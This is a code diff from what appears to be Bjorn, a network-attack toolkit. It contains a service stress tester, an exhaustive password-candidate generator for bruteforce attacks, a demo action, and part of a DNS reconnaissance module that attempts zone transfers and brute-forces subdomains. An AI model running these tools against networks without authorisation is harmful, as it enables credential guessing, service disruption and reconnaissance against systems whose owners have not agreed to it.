logger.info(f"Phase 3/4: post-stress baseline for {ip}")
self.shared_data.comment_params = {"ip": ip, "phase": "post-baseline"}
self.shared_data.log_milestone(b_class, "RecoveryMeasure", f"Checking {ip} after stress")
post_baseline = self._measure_baseline(ip, ports)
if self.shared_data.orchestrator_should_exit:
return "interrupted"
self.shared_data.bjorn_progress = "95%"
# ============================================================== #
# Phase 4: Analysis & report (95 - 100%) #
# ============================================================== #
logger.info("Phase 4/4: analyzing results")
self.shared_data.comment_params = {"ip": ip, "phase": "analysis"}
analysis = self._analyze(pre_baseline, post_baseline, stress_results, ports)
report_path = self._save_report(ip, mode, duration_s, rate, analysis)
self.shared_data.bjorn_progress = "100%"
# Final UI update
avg_deg = analysis.get("summary", {}).get("avg_degradation_pct", 0.0)
self.shared_data.log_milestone(b_class, "Complete", f"Avg Degradation: {avg_deg}% | Report: {os.path.basename(report_path)}")
return "success"
except Exception as exc:
logger.error(f"BerserkerForce failed for {ip}: {exc}", exc_info=True)
return "failed"
finally:
self.shared_data.bjorn_progress = ""
self.shared_data.comment_params = {}
self.shared_data.bjorn_status_text2 = ""
# -------------------- Optional CLI (debug / manual) ---------------------------
if __name__ == "__main__":
import argparse
from shared import SharedData
parser = argparse.ArgumentParser(description="BerserkerForce (service resilience tester)")
parser.add_argument("--ip", required=True, help="Target IP address")
parser.add_argument("--port", default="", help="Specific port (optional; uses row/DB otherwise)")
parser.add_argument("--mode", default="tcp", choices=["tcp", "syn", "http", "mixed"])
parser.add_argument("--duration", type=int, default=30, help="Stress duration in seconds")
parser.add_argument("--rate", type=int, default=20, help="Probes per second (max 50)")
args = parser.parse_args()
sd = SharedData()
# Push CLI args into shared_data so the action reads them
sd.berserker_mode = args.mode
sd.berserker_duration = args.duration
sd.berserker_rate = args.rate
act = BerserkerForce(sd)
row = {
"MAC Address": getattr(sd, "get_raspberry_mac", lambda: "__GLOBAL__")() or "__GLOBAL__",
"Hostname": "",
"Ports": args.port,
}
result = act.execute(args.ip, args.port, row, "berserker_force")
print(f"Result: {result}")


@@ -0,0 +1,114 @@
import itertools
import threading
import time
from typing import Iterable, List, Sequence
def _unique_keep_order(items: Iterable[str]) -> List[str]:
seen = set()
out: List[str] = []
for raw in items:
s = str(raw or "")
if s in seen:
continue
seen.add(s)
out.append(s)
return out
def build_exhaustive_passwords(shared_data, existing_passwords: Sequence[str]) -> List[str]:
"""
Build optional exhaustive password candidates from runtime config.
Returns a bounded list (max_candidates) to stay Pi Zero friendly.
"""
if not bool(getattr(shared_data, "bruteforce_exhaustive_enabled", False)):
return []
min_len = int(getattr(shared_data, "bruteforce_exhaustive_min_length", 1))
max_len = int(getattr(shared_data, "bruteforce_exhaustive_max_length", 4))
max_candidates = int(getattr(shared_data, "bruteforce_exhaustive_max_candidates", 2000))
require_mix = bool(getattr(shared_data, "bruteforce_exhaustive_require_mix", False))
min_len = max(1, min_len)
max_len = max(min_len, min(max_len, 8))
max_candidates = max(0, min(max_candidates, 200000))
if max_candidates == 0:
return []
use_lower = bool(getattr(shared_data, "bruteforce_exhaustive_lowercase", True))
use_upper = bool(getattr(shared_data, "bruteforce_exhaustive_uppercase", True))
use_digits = bool(getattr(shared_data, "bruteforce_exhaustive_digits", True))
use_symbols = bool(getattr(shared_data, "bruteforce_exhaustive_symbols", False))
symbols = str(getattr(shared_data, "bruteforce_exhaustive_symbols_chars", "!@#$%^&*"))
groups: List[str] = []
if use_lower:
groups.append("abcdefghijklmnopqrstuvwxyz")
if use_upper:
groups.append("ABCDEFGHIJKLMNOPQRSTUVWXYZ")
if use_digits:
groups.append("0123456789")
if use_symbols and symbols:
groups.append(symbols)
if not groups:
return []
charset = "".join(groups)
existing = set(str(x) for x in (existing_passwords or []))
generated: List[str] = []
for ln in range(min_len, max_len + 1):
for tup in itertools.product(charset, repeat=ln):
pwd = "".join(tup)
if pwd in existing:
continue
if require_mix and len(groups) > 1:
if not all(any(ch in grp for ch in pwd) for grp in groups):
continue
generated.append(pwd)
if len(generated) >= max_candidates:
return generated
return generated
class ProgressTracker:
"""
Thread-safe progress helper for bruteforce actions.
"""
def __init__(self, shared_data, total_attempts: int):
self.shared_data = shared_data
self.total = max(1, int(total_attempts))
self.attempted = 0
self._lock = threading.Lock()
self._last_emit = 0.0
self.shared_data.bjorn_progress = "0%"
def advance(self, step: int = 1):
now = time.time()
with self._lock:
self.attempted += max(1, int(step))
attempted = self.attempted
total = self.total
if now - self._last_emit < 0.2 and attempted < total:
return
self._last_emit = now
pct = min(100, int((attempted * 100) / total))
self.shared_data.bjorn_progress = f"{pct}%"
def set_complete(self):
self.shared_data.bjorn_progress = "100%"
def clear(self):
self.shared_data.bjorn_progress = ""
def merged_password_plan(shared_data, dictionary_passwords: Sequence[str]) -> tuple[list[str], list[str]]:
"""
Returns (dictionary_passwords, fallback_passwords) with uniqueness preserved.
Fallback list is empty unless exhaustive mode is enabled.
"""
dictionary = _unique_keep_order(dictionary_passwords or [])
fallback = build_exhaustive_passwords(shared_data, dictionary)
return dictionary, _unique_keep_order(fallback)
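The candidate space above grows as the sum of |charset|^L over the selected lengths, so `max_candidates` is the main safety valve. A self-contained re-derivation of the core loop with a digits-only charset (function name and limits are illustrative, not the runtime defaults):

```python
import itertools

def gen_capped(charset, min_len, max_len, cap, existing):
    out = []
    for ln in range(min_len, max_len + 1):
        for tup in itertools.product(charset, repeat=ln):
            pwd = "".join(tup)
            if pwd in existing:
                continue  # never re-try dictionary passwords
            out.append(pwd)
            if len(out) >= cap:
                return out  # hard cap keeps memory and runtime bounded
    return out

cands = gen_capped("0123456789", 1, 2, 50, {"1", "42"})
print(len(cands), cands[0], cands[-1])  # 50 0 40
```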

actions/demo_action.py Normal file

@@ -0,0 +1,234 @@
# demo_action.py
# Demonstration Action: wrapped in a DemoAction class
# ---------------------------------------------------------------------------
# Metadata (compatible with sync_actions / Neo launcher)
# ---------------------------------------------------------------------------
b_class = "DemoAction"
b_module = "demo_action"
b_enabled = 1
b_action = "normal" # normal | aggressive | stealth
b_category = "demo"
b_name = "Demo Action"
b_description = "Demonstration action: simply prints the received arguments."
b_author = "Template"
b_version = "0.1.0"
b_icon = "demo_action.png"
b_examples = [
{
"profile": "quick",
"interface": "auto",
"target": "192.168.1.10",
"port": 80,
"protocol": "tcp",
"verbose": True,
"timeout": 30,
"concurrency": 2,
"notes": "Quick HTTP scan"
},
{
"profile": "deep",
"interface": "eth0",
"target": "example.org",
"port": 443,
"protocol": "tcp",
"verbose": False,
"timeout": 120,
"concurrency": 8,
"notes": "Deep TLS profile"
}
]
b_docs_url = "docs/actions/DemoAction.md"
# ---------------------------------------------------------------------------
# UI argument schema
# ---------------------------------------------------------------------------
b_args = {
"profile": {
"type": "select",
"label": "Profile",
"choices": ["quick", "balanced", "deep"],
"default": "balanced",
"help": "Choose a profile: speed vs depth."
},
"interface": {
"type": "select",
"label": "Network Interface",
"choices": [],
"default": "auto",
"help": "'auto' tries to detect the default network interface."
},
"target": {
"type": "text",
"label": "Target (IP/Host)",
"default": "192.168.1.1",
"placeholder": "e.g. 192.168.1.10 or example.org",
"help": "Main target."
},
"port": {
"type": "number",
"label": "Port",
"min": 1,
"max": 65535,
"step": 1,
"default": 80
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 5,
"max": 600,
"step": 5,
"default": 60
},
"concurrency": {
"type": "range",
"label": "Concurrency",
"min": 1,
"max": 32,
"step": 1,
"default": 4,
"help": "Number of parallel tasks (demo only)."
},
"notes": {
"type": "text",
"label": "Notes",
"default": "",
"placeholder": "Free-form comments",
"help": "Free text field to demonstrate a simple string input."
}
}
# ---------------------------------------------------------------------------
# Dynamic detection of interfaces
# ---------------------------------------------------------------------------
import os
try:
import psutil
except Exception:
psutil = None
def _list_net_ifaces() -> list[str]:
names = set()
if psutil:
try:
names.update(ifname for ifname in psutil.net_if_addrs().keys() if ifname != "lo")
except Exception:
pass
try:
for n in os.listdir("/sys/class/net"):
if n and n != "lo":
names.add(n)
except Exception:
pass
out = ["auto"] + sorted(names)
seen, unique = set(), []
for x in out:
if x not in seen:
unique.append(x)
seen.add(x)
return unique
def compute_dynamic_b_args(base: dict) -> dict:
d = dict(base or {})
if "interface" in d:
iface = dict(d["interface"])  # copy the nested schema so the shared b_args dict is not mutated
iface["choices"] = _list_net_ifaces() or ["auto", "eth0", "wlan0"]
if iface.get("default") not in iface["choices"]:
iface["default"] = "auto"
d["interface"] = iface
return d
# ---------------------------------------------------------------------------
# DemoAction class
# ---------------------------------------------------------------------------
import argparse
class DemoAction:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.meta = {
"class": b_class,
"module": b_module,
"enabled": b_enabled,
"action": b_action,
"category": b_category,
"name": b_name,
"description": b_description,
"author": b_author,
"version": b_version,
"icon": b_icon,
"examples": b_examples,
"docs_url": b_docs_url,
"args_schema": b_args,
}
def execute(self, ip=None, port=None, row=None, status_key=None):
"""Called by the orchestrator. This demo only prints arguments."""
self.shared_data.bjorn_orch_status = "DemoAction"
self.shared_data.comment_params = {"ip": ip, "port": port}
print("=== DemoAction :: executed ===")
print(f" IP/Target: {ip}:{port}")
print(f" Row: {row}")
print(f" Status key: {status_key}")
print("No real action performed: demonstration only.")
return "success"
def run(self, argv=None):
"""Standalone CLI mode for testing."""
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument("--profile", choices=b_args["profile"]["choices"],
default=b_args["profile"]["default"])
parser.add_argument("--interface", default=b_args["interface"]["default"])
parser.add_argument("--target", default=b_args["target"]["default"])
parser.add_argument("--port", type=int, default=b_args["port"]["default"])
parser.add_argument("--protocol", choices=b_args["protocol"]["choices"],
default=b_args["protocol"]["default"])
parser.add_argument("--verbose", action="store_true",
default=bool(b_args["verbose"]["default"]))
parser.add_argument("--timeout", type=int, default=b_args["timeout"]["default"])
parser.add_argument("--concurrency", type=int, default=b_args["concurrency"]["default"])
parser.add_argument("--notes", default=b_args["notes"]["default"])
args = parser.parse_args(argv)
print("=== DemoAction :: received parameters ===")
for k, v in vars(args).items():
print(f" {k:11}: {v}")
print("\n=== Demo usage of parameters ===")
if args.verbose:
print("[verbose] Verbose mode enabled → simulated detailed logs...")
if args.profile == "quick":
print("Profile: quick → would perform fast operations.")
elif args.profile == "deep":
print("Profile: deep → would perform longer, more thorough operations.")
else:
print("Profile: balanced → compromise between speed and depth.")
print(f"Target: {args.target}:{args.port}/{args.protocol} via {args.interface}")
print(f"Timeout: {args.timeout} sec, Concurrency: {args.concurrency}")
print("No real action performed: demonstration only.")
if __name__ == "__main__":
DemoAction(shared_data=None).run()
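`_list_net_ifaces` above prepends "auto" and then de-duplicates while preserving order, so "auto" always stays first even if the detected set already contained it. The normalization step in isolation (interface names are made up):

```python
# Order-preserving de-duplication as used by _list_net_ifaces.
names = {"wlan0", "eth0", "auto"}        # "auto" may already be present
out = ["auto"] + sorted(names)           # ["auto", "auto", "eth0", "wlan0"]
seen, unique = set(), []
for x in out:
    if x not in seen:
        unique.append(x)
        seen.add(x)
print(unique)  # ['auto', 'eth0', 'wlan0']
```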

actions/dns_pillager.py Normal file

@@ -0,0 +1,837 @@
"""
dns_pillager.py - DNS reconnaissance and enumeration action for Bjorn.
Performs comprehensive DNS intelligence gathering on discovered hosts:
- Reverse DNS lookup on target IP
- Full DNS record enumeration (A, AAAA, MX, NS, TXT, CNAME, SOA, SRV, PTR)
- Zone transfer (AXFR) attempts against discovered nameservers
- Subdomain brute-force enumeration with threading
SQL mode:
- Targets provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Discovered hostnames are written back to DB hosts table
- Results saved as JSON in data/output/dns/
- Action status recorded in DB.action_results (via DNSPillager.execute)
"""
import os
import json
import socket
import logging
import threading
import time
import datetime
from typing import Dict, List, Optional, Tuple, Set
from concurrent.futures import ThreadPoolExecutor, as_completed
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="dns_pillager.py", level=logging.DEBUG)
# ---------------------------------------------------------------------------
# Graceful import for dnspython (socket fallback if unavailable)
# ---------------------------------------------------------------------------
_HAS_DNSPYTHON = False
try:
import dns.resolver
import dns.zone
import dns.query
import dns.reversename
import dns.rdatatype
import dns.exception
_HAS_DNSPYTHON = True
logger.info("dnspython library loaded successfully.")
except ImportError:
logger.warning(
"dnspython not installed. DNS operations will use socket fallback "
"(limited functionality). Install with: pip install dnspython"
)
# ---------------------------------------------------------------------------
# Action metadata (AST-friendly, consumed by sync_actions / orchestrator)
# ---------------------------------------------------------------------------
b_class = "DNSPillager"
b_module = "dns_pillager"
b_status = "dns_pillager"
b_port = 53
b_service = '["dns"]'
b_trigger = 'on_any:["on_host_alive","on_new_port:53"]'
b_parent = None
b_action = "normal"
b_requires = '{"action":"NetworkScanner","status":"success","scope":"global"}'
b_priority = 20
b_cooldown = 7200
b_rate_limit = "5/86400"
b_timeout = 300
b_max_retries = 2
b_stealth_level = 7
b_risk_level = "low"
b_enabled = 1
b_tags = ["dns", "recon", "enumeration"]
b_category = "recon"
b_name = "DNS Pillager"
b_description = (
"Comprehensive DNS reconnaissance and enumeration action. "
"Performs reverse DNS, record enumeration (A/AAAA/MX/NS/TXT/CNAME/SOA/SRV/PTR), "
"zone transfer attempts, and subdomain brute-force discovery. "
"Requires: dnspython (pip install dnspython) for full functionality; "
"falls back to socket-based lookups if unavailable."
)
b_author = "Bjorn Team"
b_version = "2.0.0"
b_icon = "DNSPillager.png"
b_args = {
"threads": {
"type": "number",
"label": "Subdomain Threads",
"min": 1,
"max": 50,
"step": 1,
"default": 10,
"help": "Number of threads for subdomain brute-force enumeration."
},
"wordlist": {
"type": "text",
"label": "Subdomain Wordlist",
"default": "",
"placeholder": "/path/to/wordlist.txt",
"help": "Path to a custom subdomain wordlist file. Leave empty for built-in list (~100 entries)."
},
"timeout": {
"type": "number",
"label": "DNS Query Timeout (s)",
"min": 1,
"max": 30,
"step": 1,
"default": 3,
"help": "Timeout in seconds for individual DNS queries."
},
"enable_axfr": {
"type": "checkbox",
"label": "Attempt Zone Transfer (AXFR)",
"default": True,
"help": "Try AXFR zone transfers against discovered nameservers."
},
"enable_subdomains": {
"type": "checkbox",
"label": "Enable Subdomain Brute-Force",
"default": True,
"help": "Enumerate subdomains using wordlist."
},
}
b_examples = [
{"threads": 10, "wordlist": "", "timeout": 3, "enable_axfr": True, "enable_subdomains": True},
{"threads": 5, "wordlist": "/home/bjorn/wordlists/subdomains.txt", "timeout": 5, "enable_axfr": False, "enable_subdomains": True},
]
b_docs_url = "docs/actions/DNSPillager.md"
# ---------------------------------------------------------------------------
# Data directories
# ---------------------------------------------------------------------------
_DATA_DIR = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), "data")
OUTPUT_DIR = os.path.join(_DATA_DIR, "output", "dns")
# ---------------------------------------------------------------------------
# Built-in subdomain wordlist (~100 common entries)
# ---------------------------------------------------------------------------
BUILTIN_SUBDOMAINS = [
"www", "mail", "ftp", "localhost", "webmail", "smtp", "pop", "ns1", "ns2",
"ns3", "ns4", "dns", "dns1", "dns2", "mx", "mx1", "mx2", "imap", "pop3",
"blog", "dev", "staging", "test", "testing", "beta", "alpha", "demo",
"admin", "administrator", "panel", "cpanel", "webmin", "portal",
"api", "api2", "api3", "gateway", "gw", "proxy", "cdn", "media",
"static", "assets", "img", "images", "files", "download", "upload",
"vpn", "remote", "ssh", "rdp", "citrix", "owa", "exchange",
"db", "database", "mysql", "postgres", "sql", "mongodb", "redis", "elastic",
"shop", "store", "app", "apps", "mobile", "m",
"intranet", "extranet", "internal", "external", "private", "public",
"cloud", "aws", "azure", "gcp", "s3", "storage",
"git", "gitlab", "github", "svn", "repo", "ci", "cd", "jenkins", "build",
"monitor", "monitoring", "grafana", "prometheus", "kibana", "nagios", "zabbix",
"log", "logs", "syslog", "elk",
"chat", "slack", "teams", "jira", "confluence", "wiki",
"backup", "backups", "bak", "archive",
"secure", "security", "sso", "auth", "login", "oauth",
"docs", "doc", "help", "support", "kb", "status",
"calendar", "crm", "erp", "hr",
"web", "web1", "web2", "server", "server1", "server2",
"host", "node", "worker", "master",
]
# DNS record types to enumerate
DNS_RECORD_TYPES = ["A", "AAAA", "MX", "NS", "TXT", "CNAME", "SOA", "SRV", "PTR"]
class DNSPillager:
"""
DNS reconnaissance action for the Bjorn orchestrator.
Performs reverse DNS, record enumeration, zone transfer attempts,
and subdomain brute-force discovery.
"""
def __init__(self, shared_data: SharedData):
self.shared_data = shared_data
# IP -> (MAC, hostname) identity cache from DB
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
# DNS resolver setup (dnspython)
self._resolver = None
if _HAS_DNSPYTHON:
self._resolver = dns.resolver.Resolver()
self._resolver.timeout = 3
self._resolver.lifetime = 5
# Ensure output directory exists
try:
os.makedirs(OUTPUT_DIR, exist_ok=True)
except Exception as e:
logger.error(f"Failed to create output directory {OUTPUT_DIR}: {e}")
# Thread safety
self._lock = threading.Lock()
logger.info("DNSPillager initialized (dnspython=%s)", _HAS_DNSPYTHON)
# --------------------- Identity cache (hosts) ---------------------
def _refresh_ip_identity_cache(self) -> None:
"""Rebuild IP -> (MAC, current_hostname) from DB.hosts."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip_addr in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip_addr] = (mac, current_hn)
def _mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def _hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# --------------------- Public API (Orchestrator) ---------------------
def execute(self, ip: str, port: str, row: Dict, status_key: str) -> str:
"""
Execute DNS reconnaissance on the given target.
Args:
ip: Target IP address
port: Target port (typically 53)
row: Row dict from orchestrator (contains MAC, hostname, etc.)
status_key: Status tracking key
Returns:
'success' | 'failed' | 'interrupted'
"""
self.shared_data.bjorn_orch_status = "DNSPillager"
self.shared_data.bjorn_progress = "0%"
self.shared_data.comment_params = {"ip": ip, "port": str(port), "phase": "init"}
results = {
"target_ip": ip,
"port": str(port),
"timestamp": datetime.datetime.now().isoformat(),
"reverse_dns": None,
"domain": None,
"records": {},
"zone_transfer": {},
"subdomains": [],
"errors": [],
}
try:
# --- Check for early exit ---
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal before start.")
return "interrupted"
mac = row.get("MAC Address") or row.get("mac_address") or self._mac_for_ip(ip) or ""
hostname = (
row.get("Hostname") or row.get("hostname")
or self._hostname_for_ip(ip)
or ""
)
# =========================================================
# Phase 1: Reverse DNS lookup (0% -> 10%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "reverse_dns"}
logger.info(f"[{ip}] Phase 1: Reverse DNS lookup")
reverse_hostname = self._reverse_dns(ip)
if reverse_hostname:
results["reverse_dns"] = reverse_hostname
logger.info(f"[{ip}] Reverse DNS: {reverse_hostname}")
self.shared_data.log_milestone(b_class, "ReverseDNS", f"IP: {ip} -> {reverse_hostname}")
# Update hostname if we found something new
if not hostname or hostname == ip:
hostname = reverse_hostname
else:
logger.info(f"[{ip}] No reverse DNS result.")
self.shared_data.bjorn_progress = "10%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 2: Extract domain and enumerate DNS records (10% -> 35%)
# =========================================================
domain = self._extract_domain(hostname)
results["domain"] = domain
if domain:
self.shared_data.comment_params = {"ip": ip, "phase": "records", "domain": domain}
logger.info(f"[{ip}] Phase 2: DNS record enumeration for {domain}")
self.shared_data.log_milestone(b_class, "EnumerateRecords", f"Domain: {domain}")
record_results = {}
total_types = len(DNS_RECORD_TYPES)
for idx, rtype in enumerate(DNS_RECORD_TYPES):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
records = self._query_records(domain, rtype)
if records:
record_results[rtype] = records
logger.info(f"[{ip}] {rtype} records for {domain}: {records}")
# Progress: 10% -> 35% across record types
pct = 10 + int((idx + 1) / total_types * 25)
self.shared_data.bjorn_progress = f"{pct}%"
results["records"] = record_results
else:
logger.warning(f"[{ip}] No domain could be extracted. Skipping record enumeration.")
self.shared_data.bjorn_progress = "35%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 3: Zone transfer (AXFR) attempt (35% -> 45%)
# =========================================================
self.shared_data.bjorn_progress = "35%"
self.shared_data.comment_params = {"ip": ip, "phase": "zone_transfer", "domain": domain or ip}
if domain and _HAS_DNSPYTHON:
logger.info(f"[{ip}] Phase 3: Zone transfer attempt for {domain}")
nameservers = results["records"].get("NS", [])
# Also try the target IP itself as a nameserver
ns_targets = list(set(nameservers + [ip]))
zone_results = {}
for ns_idx, ns in enumerate(ns_targets):
if self.shared_data.orchestrator_should_exit:
return "interrupted"
axfr_records = self._attempt_zone_transfer(domain, ns)
if axfr_records:
zone_results[ns] = axfr_records
logger.success(f"[{ip}] Zone transfer SUCCESS from {ns}: {len(axfr_records)} records")
self.shared_data.log_milestone(b_class, "AXFRSuccess", f"NS: {ns} | Records: {len(axfr_records)}")
# Progress within 35% -> 45%
if ns_targets:
pct = 35 + int((ns_idx + 1) / len(ns_targets) * 10)
self.shared_data.bjorn_progress = f"{pct}%"
results["zone_transfer"] = zone_results
else:
if not _HAS_DNSPYTHON:
results["errors"].append("Zone transfer skipped: dnspython not available")
elif not domain:
results["errors"].append("Zone transfer skipped: no domain found")
logger.info(f"[{ip}] Skipping zone transfer (dnspython={_HAS_DNSPYTHON}, domain={domain})")
self.shared_data.bjorn_progress = "45%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 4: Subdomain brute-force (45% -> 95%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "subdomains", "domain": domain or ip}
if domain:
logger.info(f"[{ip}] Phase 4: Subdomain brute-force for {domain}")
self.shared_data.log_milestone(b_class, "SubdomainEnum", f"Domain: {domain}")
wordlist = self._load_wordlist()
thread_count = min(10, max(1, len(wordlist)))  # hard cap of 10 workers to stay Pi Zero friendly
discovered = self._enumerate_subdomains(domain, wordlist, thread_count)
results["subdomains"] = discovered
logger.info(f"[{ip}] Subdomain enumeration found {len(discovered)} live subdomains")
else:
logger.info(f"[{ip}] Skipping subdomain enumeration: no domain available")
results["errors"].append("Subdomain enumeration skipped: no domain found")
self.shared_data.bjorn_progress = "95%"
if self.shared_data.orchestrator_should_exit:
return "interrupted"
# =========================================================
# Phase 5: Save results and update DB (95% -> 100%)
# =========================================================
self.shared_data.comment_params = {"ip": ip, "phase": "saving"}
logger.info(f"[{ip}] Phase 5: Saving results")
# Save JSON output
self._save_results(ip, results)
# Update DB hostname if reverse DNS discovered new data
if reverse_hostname and mac:
self._update_db_hostname(mac, ip, reverse_hostname)
self.shared_data.bjorn_progress = "100%"
self.shared_data.log_milestone(b_class, "Complete", f"Records: {sum(len(v) for v in results['records'].values())} | Subdomains: {len(results['subdomains'])}")
# Summary comment
record_count = sum(len(v) for v in results["records"].values())
zone_count = sum(len(v) for v in results["zone_transfer"].values())
sub_count = len(results["subdomains"])
self.shared_data.comment_params = {
"ip": ip,
"domain": domain or "N/A",
"records": str(record_count),
"zones": str(zone_count),
"subdomains": str(sub_count),
}
logger.success(
f"[{ip}] DNS Pillager complete: domain={domain}, "
f"records={record_count}, zone_transfers={zone_count}, subdomains={sub_count}"
)
return "success"
except Exception as e:
logger.error(f"[{ip}] DNSPillager execute failed: {e}")
results["errors"].append(str(e))
# Still try to save partial results
try:
self._save_results(ip, results)
except Exception:
pass
return "failed"
finally:
self.shared_data.bjorn_progress = ""
# --------------------- Reverse DNS ---------------------
def _reverse_dns(self, ip: str) -> Optional[str]:
"""Perform reverse DNS lookup on the IP address."""
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
rev_name = dns.reversename.from_address(ip)
answers = self._resolver.resolve(rev_name, "PTR")
for rdata in answers:
hostname = str(rdata).rstrip(".")
if hostname:
return hostname
except Exception as e:
logger.debug(f"dnspython reverse DNS failed for {ip}: {e}")
# Socket fallback
try:
hostname, _, _ = socket.gethostbyaddr(ip)
if hostname and hostname != ip:
return hostname
except (socket.herror, socket.gaierror, OSError) as e:
logger.debug(f"Socket reverse DNS failed for {ip}: {e}")
return None
# --------------------- Domain extraction ---------------------
@staticmethod
def _extract_domain(hostname: str) -> Optional[str]:
"""
Extract the registerable domain from a hostname.
e.g., 'mail.sub.example.com' -> 'example.com'
'host1.internal.lan' -> 'internal.lan'
'192.168.1.1' -> None
"""
if not hostname:
return None
# Skip raw IPs
hostname = hostname.strip().rstrip(".")
parts = hostname.split(".")
if len(parts) < 2:
return None
# Check if it looks like an IP address
try:
socket.inet_aton(hostname)
return None # It's an IP, not a hostname
except (socket.error, OSError):
pass
# For simple TLDs, take the last 2 parts
# For compound TLDs (co.uk, com.au), take the last 3 parts
compound_tlds = {
"co.uk", "co.jp", "co.kr", "co.nz", "co.za", "co.in",
"com.au", "com.br", "com.cn", "com.mx", "com.tw",
"org.uk", "net.au", "ac.uk", "gov.uk",
}
if len(parts) >= 3:
possible_compound = f"{parts[-2]}.{parts[-1]}"
if possible_compound.lower() in compound_tlds:
return ".".join(parts[-3:])
return ".".join(parts[-2:])
# --------------------- DNS record queries ---------------------
def _query_records(self, domain: str, record_type: str) -> List[str]:
"""Query DNS records of a given type for a domain."""
records = []
# Try dnspython first
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(domain, record_type)
for rdata in answers:
value = str(rdata).rstrip(".")
if value:
records.append(value)
return records
except dns.resolver.NXDOMAIN:
logger.debug(f"NXDOMAIN for {domain} {record_type}")
except dns.resolver.NoAnswer:
logger.debug(f"No answer for {domain} {record_type}")
except dns.resolver.NoNameservers:
logger.debug(f"No nameservers for {domain} {record_type}")
except dns.exception.Timeout:
logger.debug(f"Timeout querying {domain} {record_type}")
except Exception as e:
logger.debug(f"dnspython query failed for {domain} {record_type}: {e}")
# Socket fallback (limited to A records only)
if record_type == "A" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} A: {e}")
# Socket fallback for AAAA
if record_type == "AAAA" and not records:
try:
ips = socket.getaddrinfo(domain, None, socket.AF_INET6, socket.SOCK_STREAM)
for info in ips:
addr = info[4][0]
if addr and addr not in records:
records.append(addr)
except (socket.gaierror, OSError) as e:
logger.debug(f"Socket fallback failed for {domain} AAAA: {e}")
return records
# --------------------- Zone transfer (AXFR) ---------------------
def _attempt_zone_transfer(self, domain: str, nameserver: str) -> List[Dict]:
"""
Attempt an AXFR zone transfer from a nameserver.
Returns a list of record dicts on success, empty list on failure.
"""
if not _HAS_DNSPYTHON:
return []
records = []
# Resolve NS hostname to IP if needed
ns_ip = self._resolve_ns_to_ip(nameserver)
if not ns_ip:
logger.debug(f"Cannot resolve NS {nameserver} to IP, skipping AXFR")
return []
try:
zone = dns.zone.from_xfr(
dns.query.xfr(ns_ip, domain, timeout=10, lifetime=30)
)
for name, node in zone.nodes.items():
for rdataset in node.rdatasets:
for rdata in rdataset:
records.append({
"name": str(name),
"type": dns.rdatatype.to_text(rdataset.rdtype),
"ttl": rdataset.ttl,
"value": str(rdata),
})
except dns.exception.FormError:
logger.debug(f"AXFR refused by {nameserver} ({ns_ip}) for {domain}")
except dns.exception.Timeout:
logger.debug(f"AXFR timeout from {nameserver} ({ns_ip}) for {domain}")
except ConnectionError as e:
logger.debug(f"AXFR connection error from {nameserver}: {e}")
except OSError as e:
logger.debug(f"AXFR OS error from {nameserver}: {e}")
except Exception as e:
logger.debug(f"AXFR failed from {nameserver} ({ns_ip}) for {domain}: {e}")
return records
def _resolve_ns_to_ip(self, nameserver: str) -> Optional[str]:
"""Resolve a nameserver hostname to an IP address."""
ns = nameserver.strip().rstrip(".")
# Check if already an IP
try:
socket.inet_aton(ns)
return ns
except (socket.error, OSError):
pass
# Try to resolve
if _HAS_DNSPYTHON and self._resolver:
try:
answers = self._resolver.resolve(ns, "A")
for rdata in answers:
return str(rdata)
except Exception:
pass
# Socket fallback
try:
result = socket.getaddrinfo(ns, 53, socket.AF_INET, socket.SOCK_STREAM)
if result:
return result[0][4][0]
except Exception:
pass
return None
# --------------------- Subdomain enumeration ---------------------
def _load_wordlist(self) -> List[str]:
"""Load subdomain wordlist from file or use built-in list."""
# Check for configured wordlist path
wordlist_path = ""
if hasattr(self.shared_data, "config") and self.shared_data.config:
wordlist_path = self.shared_data.config.get("dns_wordlist", "")
if wordlist_path and os.path.isfile(wordlist_path):
try:
with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as f:
words = [line.strip() for line in f if line.strip() and not line.startswith("#")]
if words:
logger.info(f"Loaded {len(words)} subdomains from {wordlist_path}")
return words
except Exception as e:
logger.error(f"Failed to load wordlist {wordlist_path}: {e}")
logger.info(f"Using built-in subdomain wordlist ({len(BUILTIN_SUBDOMAINS)} entries)")
